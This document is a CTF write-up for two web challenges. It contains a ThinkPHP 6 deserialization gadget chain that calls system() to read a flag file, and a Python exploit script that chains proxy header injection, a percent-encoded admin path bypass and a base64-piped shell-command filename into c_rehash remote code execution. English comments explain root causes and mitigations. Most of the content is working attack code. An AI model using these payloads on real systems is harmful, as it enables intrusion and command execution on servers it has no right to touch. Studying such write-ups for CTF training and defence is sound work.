Web
Ezpop
tp6反序列化链子,网上很多
<?php
// Deserialization gadget chain against the ThinkPHP 6 ("tp6") model classes.
// Nothing here is exploitable on its own: the chain only fires where
// attacker-controlled bytes reach unserialize(). The defensive fix is to never
// unserialize untrusted input (prefer JSON; if unserialize() is unavoidable, pass
// ['allowed_classes' => false]) and to keep the framework at a patched version.
// Detection hint: a URL-encoded PHP serialized string naming think\model\Pivot
// with a nested Pivot in a request parameter.
namespace think\model\concern;
// Only the properties the chain needs are declared; the real trait has many more.
// $data holds the value that ends up being processed, $withAttr names the callable
// applied to it, and $json / $jsonAssoc mark the attribute as JSON so that code path
// is taken. NOTE(review): the accessor path that actually invokes the $withAttr
// callable is not shown on this page; the chain as written relies on it.
trait Attribute{ private $data=['jiang'=>['jiang'=>'cat${IFS}/flag.txt']]; private $withAttr=['jiang'=>['jiang'=>'system']]; protected $json=["jiang"]; protected $jsonAssoc = true; }
// $withEvent is set to false in the constructor below, presumably so model event
// hooks do not interrupt the chain — confirm against the framework source.
trait ModelEvent{ protected $withEvent; }
namespace think;
// Minimal stand-in for think\Model: abstract, so it cannot be instantiated itself;
// the concrete Pivot subclass below is what ends up in the serialized string.
// $exists / $force / $lazySave all true select the save-on-destruct behaviour the
// chain depends on (assumed from the field names — TODO confirm in the framework).
abstract class Model{ use model\concern\Attribute; use model\concern\ModelEvent; private $exists; private $force; private $lazySave; protected $suffix;
// $a becomes $suffix; the outer object receives a second Pivot here, presumably so
// that string-coercing the suffix later pulls the inner model into the chain.
function __construct($a = '') { $this->exists = true; $this->force = true; $this->lazySave = true; $this->withEvent = false; $this->suffix = $a; } }
namespace think\model;
use think\Model;
// Concrete, instantiable subclass; its class name is what appears in the payload.
class Pivot extends Model{}
// urlencode() so the serialized string survives transport in a query/form parameter.
echo urlencode(serialize(new Pivot(new Pivot()))); ?>
online_crt
c_rehash 脚本存在命令注入：利用 proxy 中的重命名功能把已创建的证书文件名改成 payload，再通过 createlink 触发，实现 RCE。
# Writeup script for the "online_crt" challenge. Annotated from a defender's view:
# each step marks a server-side weakness the challenge chains together.
import requests
# NOTE(review): only `urllib` is imported but `urllib.parse` is used below; this
# works only because `requests` loads urllib.parse as a side effect. An explicit
# `import urllib.parse` would be the robust form.
import urllib
import base64

# All requests (except /createlink, see below) go through a local intercepting
# proxy on 127.0.0.1:8080 so the traffic can be inspected while debugging.
proxy={'http':'http://127.0.0.1:8080'}

# Challenge instance host (from the writeup).
url='http://eci-2zegvqjy0fqhy23dpkdo.cloudeci1.ichunqiu.com:8888'
# The command is base64-encoded so it contains no characters the filename would
# mangle; it is decoded and executed only when the renamed file name is later
# interpreted by a shell. Root cause on the server: the certificate filename is
# user-controlled and reaches c_rehash, which passes it to the shell unquoted.
# Mitigation: validate stored filenames against a strict allow-list (e.g. the
# expected hash format) and use a patched OpenSSL / `openssl rehash` instead of
# the c_rehash script. `mac123` is the file the command's output is written to.
cmd=base64.b64encode('ls'.encode()).decode()
print(cmd)
payload=urllib.parse.quote(f'"||echo {cmd}|base64 -d|sh>mac123||echo".cer')
# Form fields for the certificate-creation endpoint; values are arbitrary.
crt='Country=1&Province=1&City=1&OrganizationalName=1&CommonName=1&EmailAddress=1%40q&submit='

# /getcrt creates a certificate and returns a page containing its path under
# static/crt/. NOTE(review): the endpoint is called twice; the first call is only
# printed and creates an extra certificate — the second call alone is what is used.
old = requests.post(url + "/getcrt",data=crt,proxies=proxy).text
print(old)
old = requests.post(url + "/getcrt",data=crt,proxies=proxy).text.split('static/crt/')[1]
print(old)
old=urllib.parse.quote(old)

# A complete raw HTTP request that the server's /proxy endpoint forwards internally.
# Two server-side weaknesses are relied on here: the proxy forwards an
# attacker-supplied request line and headers (so `Host: admin` and CRLF-delimited
# headers are attacker-chosen), and the admin-only rename route is reached via a
# percent-encoded path (`/%61%64%6d%69%6e/...` decodes to `/admin/rename`),
# which suggests the authorization check compares the raw, un-decoded path.
# Mitigations: canonicalize (percent-decode, normalize) the path before the
# authorization decision, do not let clients supply raw request lines to an
# internal proxy, and reject CR/LF in proxied parameters. Detection: percent-encoded
# alphanumerics in request paths and embedded "\r\n" in parameter values.
uri1={'uri': f"/%61%64%6d%69%6e/%72%65%6e%61%6d%65?oldname={old}&newname={payload} HTTP/1.1\r\n" "Host: admin\r\n" "User-Agent: Guest\r\n" "Accept-Encoding: gzip, deflate\r\n" "Accept-Language: zh-CN,zh;q=0.9\r\n" "Connection: close\r\n\r\n" }

# GET with a request body is unusual but is what this endpoint expects.
r1=requests.get(url+"/proxy",data=uri1,proxies=proxy).text
print(r1)
# /createlink runs the certificate re-hash step on the server, which is where the
# renamed file name is interpreted by a shell. NOTE(review): this call omits
# proxies=proxy, so it will not appear in the intercepting proxy's history.
link=requests.get(url+"/createlink").text
print(link)

# The command's output was written into the web-served certificate directory;
# serving that directory with arbitrary file names is itself a weakness
# (write-then-read via static files). Restrict it to validated certificate files.
print(requests.get(url+"/static/crt/mac123",proxies=proxy).text)